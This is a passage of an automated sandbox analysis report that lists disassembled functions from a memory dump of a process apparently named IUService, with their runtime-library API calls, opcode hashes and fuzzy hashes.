                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$qqrpvibFillQuerySystem@@Virtual
                                                                                                                                            • String ID: <JP$jP
                                                                                                                                            • API String ID: 2244405464-1976356052
                                                                                                                                            • Opcode ID: d4214674cb1b790d79c068eba0a754b99b72d6d1fa264546a80965101dd17e03
                                                                                                                                            • Instruction ID: bcffa789d984cc2227a1b944b815eb85179e7a29a5b5a1ae78bfe4e670926a00
                                                                                                                                            • Opcode Fuzzy Hash: d4214674cb1b790d79c068eba0a754b99b72d6d1fa264546a80965101dd17e03
                                                                                                                                            • Instruction Fuzzy Hash: 7C21DA357045C18FF326C69C98E078A779AE7D5250FA48769E1C58B286D7B0DC41C793
                                                                                                                                            Function 5000B95C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@_llumod$qqrv.RTL120(0000000A,00000000), ref: 5000B978
                                                                                                                                            • @System@@_lludiv$qqrv.RTL120(0000000A,00000000), ref: 5000B993
                                                                                                                                            • @System@@SetLength$qqrp28System@%SmallString$iuc$255%uc.RTL120 ref: 5000B9F2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Length$qqrp28SmallString$iuc$255%ucSystem@%System@@System@@_lludiv$qqrvSystem@@_llumod$qqrv
                                                                                                                                            • String ID: -
                                                                                                                                            • API String ID: 1433924716-2547889144
                                                                                                                                            • Opcode ID: fa2d9fa7220ae8a8b5e2127b09392bd41d7e1e4dd11ae780642dc36a45f227ea
                                                                                                                                            • Instruction ID: bc71e0da4f25463f64f7145e0403e3090bf30eba9254fb7a0d98b2b38cbe9050
                                                                                                                                            • Opcode Fuzzy Hash: fa2d9fa7220ae8a8b5e2127b09392bd41d7e1e4dd11ae780642dc36a45f227ea
                                                                                                                                            • Instruction Fuzzy Hash: 07115E25B043C91AF711AE65D4E178E7BD1DF91310F60C236ED488B3B2D6718C45C740
                                                                                                                                            Function 500110D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500110D5
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 500110E7
                                                                                                                                              • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                                                              • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                                                              • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                                                            • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120 ref: 50011120
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$CategoryCheckFindInitialize$qqrvLatin1$qqrbLoadLockSeparator$qqr26Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 305751366-3916222277
                                                                                                                                            • Opcode ID: ee0eee03fca6bd072fe399242877850c852a16c1db9b3c22b6777e204e8b1ebd
                                                                                                                                            • Instruction ID: 4cfc787b75a84d5a1d5c986ac9783fa5e206bb40ce50e3d6909b12ff5fbc43b5
                                                                                                                                            • Opcode Fuzzy Hash: ee0eee03fca6bd072fe399242877850c852a16c1db9b3c22b6777e204e8b1ebd
                                                                                                                                            • Instruction Fuzzy Hash: E2F0E991B254A14BE3184761EC612F463E2A394312B9C423EF993CB2D6DB3589E5E720
                                                                                                                                            Function 50012038 Relevance: 6.3, APIs: 4, Instructions: 314COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 84c94b66c65c3e9b87035ca3d27372d4e35400a0308ff6c0a7594b6a834fe7a0
                                                                                                                                            • Instruction ID: f29600500c8ce473a63ea4a4c58500fabea73661ee4b4393fbd01134744e99f1
                                                                                                                                            • Opcode Fuzzy Hash: 84c94b66c65c3e9b87035ca3d27372d4e35400a0308ff6c0a7594b6a834fe7a0
                                                                                                                                            • Instruction Fuzzy Hash: 81A114314093C0AFC706CB609E66959BFB9FF5321071982DAD5808F173D3359AB6D7A2
                                                                                                                                            Function 5000C120 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@GetMem$qqri.RTL120(?), ref: 5000C1A5
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120(?), ref: 5000C1D5
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?), ref: 5000C1F5
                                                                                                                                            • @System@DynArrayClear$qqrrpvpv.RTL120 ref: 5000C200
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@$ArrayChar$qqrpvibClear$qqrrpvpvFillMem$qqriMove$qqrpxvpvi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3421884137-0
                                                                                                                                            • Opcode ID: d72ef6b357c912858527ba27ee4b5402b2d8ef4a25db6a3fc010ba388ca52663
                                                                                                                                            • Instruction ID: 5db1012356cac20667bbd3f12f650a3e6fe453fe90b972ea62dd2f95c9d85502
                                                                                                                                            • Opcode Fuzzy Hash: d72ef6b357c912858527ba27ee4b5402b2d8ef4a25db6a3fc010ba388ca52663
                                                                                                                                            • Instruction Fuzzy Hash: 3B312D71E002599FDB14DF98CCA0ADEF7F1FF49220B518266E819EB352D7709E018B90
                                                                                                                                            Function 50025A30 Relevance: 6.1, APIs: 4, Instructions: 87timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 50024D00: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50025040), ref: 50024D80
                                                                                                                                              • Part of subcall function 50024D00: @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50025040), ref: 50024D8B
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50025B12), ref: 50025A96
                                                                                                                                            • @Sysutils@TryStrToTime$qqrx20System@UnicodeStringr16System@TDateTimerx24Sysutils@TFormatSettings.RTL120(?,00000000,50025B12), ref: 50025ACA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$Sysutils@$StringSystem@@$AnsiCopy$qqrx20DateFormatFromInternalSettingsStr$qqrr20StringiiStringr16Stringx27System@%T$us$i0$%Time$qqrx20Timerx24Trim$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2292931001-0
                                                                                                                                            • Opcode ID: 84447efb2cb3415f8d16ecc4577d258c5cf45c66936d73402ad984f0ee6a8cab
                                                                                                                                            • Instruction ID: d33868aacac2f56ee1de542acf73dd20ca58ab904041af6ac397144845128ccd
                                                                                                                                            • Opcode Fuzzy Hash: 84447efb2cb3415f8d16ecc4577d258c5cf45c66936d73402ad984f0ee6a8cab
                                                                                                                                            • Instruction Fuzzy Hash: 0C315E3090654EEFCF00DFA4E9928DDB7F6EF59301F6046A6E800A7250DB719E05DB99
                                                                                                                                            Function 50025948 Relevance: 6.1, APIs: 4, Instructions: 81timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500248EC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024C6D), ref: 50024968
                                                                                                                                              • Part of subcall function 500248EC: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024C6D), ref: 5002498C
                                                                                                                                              • Part of subcall function 500248EC: @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50024C6D), ref: 50024997
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50025A1C), ref: 500259AA
                                                                                                                                            • @Sysutils@TryStrToTime$qqrx20System@UnicodeStringr16System@TDateTime.RTL120(00000000,50025A1C), ref: 500259DA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Copy$qqrx20DateStringiiStringr16TimeTime$qqrx20Trim$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2689908369-0
                                                                                                                                            • Opcode ID: b0c36b5748d489f7461d89ea8bf913bcfd18d707684df885256712fd9f4fa0f3
                                                                                                                                            • Instruction ID: 93a382b7fa73da40bbc338623e28f744c92bd425220c80b90625fb34c49939c0
                                                                                                                                            • Opcode Fuzzy Hash: b0c36b5748d489f7461d89ea8bf913bcfd18d707684df885256712fd9f4fa0f3
                                                                                                                                            • Instruction Fuzzy Hash: E521D13091218ADBDF00DFA4E8829EDB7F6EF48311F6006A2D440E3200EB309E40DB89
                                                                                                                                            Function 50009B2C Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@NewWideString$qqri.RTL120 ref: 50009B82
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 50009B99
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 50009BA9
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 50009BC7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Move$qqrpxvpviSystem@$String$qqriSystem@@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2978300780-0
                                                                                                                                            • Opcode ID: 9ed6245364869eda90bbe2cf8a72df44c5e7e2fe0a89643c11834f0be839a104
                                                                                                                                            • Instruction ID: 2cc34c0e70a3c0a200f551ea926f3f83d6c741b9e70e651da199dcfddd72ecd4
                                                                                                                                            • Opcode Fuzzy Hash: 9ed6245364869eda90bbe2cf8a72df44c5e7e2fe0a89643c11834f0be839a104
                                                                                                                                            • Instruction Fuzzy Hash: D3219D757046458FEB14DE6CE9E089EB3E5EB94220B844B3DE946C7361EA31EC048781
                                                                                                                                            Function 50024410 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                                                              • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,500244C4), ref: 5002446D
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,500244C4), ref: 50024472
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$StringSystem@System@@$EnsureString$qqrr20$Len$qqrx20$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3424071357-0
                                                                                                                                            • Opcode ID: 163a8ac3203b88bc679271fd277f8823215291bac1fd57a86e87f28860fdda50
                                                                                                                                            • Instruction ID: f3f28708e52072fea52f12d8c3f656ea0e7ad7d042a07a009517b6842a75c669
                                                                                                                                            • Opcode Fuzzy Hash: 163a8ac3203b88bc679271fd277f8823215291bac1fd57a86e87f28860fdda50
                                                                                                                                            • Instruction Fuzzy Hash: 90210531901185DFCB51EFA8D891ADDB7F4EF6A310F6042A2E844D3351E7309E10C791
                                                                                                                                            Function 50024634 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                                                              • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500246CE), ref: 5002467C
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500246CE), ref: 500246A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$StringSystem@System@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$EnsureInternalString$qqrr20$Len$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3299320216-0
                                                                                                                                            • Opcode ID: 063df37b82a887ee646a343d3283fa2db6b459733aeeaa70d7aed97fde92dc1c
                                                                                                                                            • Instruction ID: f889b8404583497afe00f4d2b022e65e4a04262e97f4224d3da720eb7ba1a7cf
                                                                                                                                            • Opcode Fuzzy Hash: 063df37b82a887ee646a343d3283fa2db6b459733aeeaa70d7aed97fde92dc1c
                                                                                                                                            • Instruction Fuzzy Hash: 8D11C630B0218ADFDB51DFA8E94589EB3F9EF963007A14276E940D3215E730EE01D791
                                                                                                                                            Function 50013328 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Math@IsZero$qqrxgg.RTL120(00000000,00000000,00000000,?,?,?), ref: 5001333F
                                                                                                                                            • @Math@SameValue$qqrxgxgg.RTL120(00000000,00000000,00000000,00000000,80000000,00003FFF,?,?,?,00000000,00000000,00000000,?,?,?), ref: 50013379
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Math@$SameValue$qqrxgxggZero$qqrxgg
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2598474148-0
                                                                                                                                            • Opcode ID: c5316efb0892469dfe6559604264221be66581b1a931cb23f285ec7ffa091242
                                                                                                                                            • Instruction ID: 8b6f4d4d102a9fe6760369e0e7593088a52b22f4b9c98d94c50d589b633ebce5
                                                                                                                                            • Opcode Fuzzy Hash: c5316efb0892469dfe6559604264221be66581b1a931cb23f285ec7ffa091242
                                                                                                                                            • Instruction Fuzzy Hash: 28110D70E48245B6EF315FA08C027AE7FA0AF01A10F208B4BFEF4A51D1DA724260C789
                                                                                                                                            Function 500246E0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
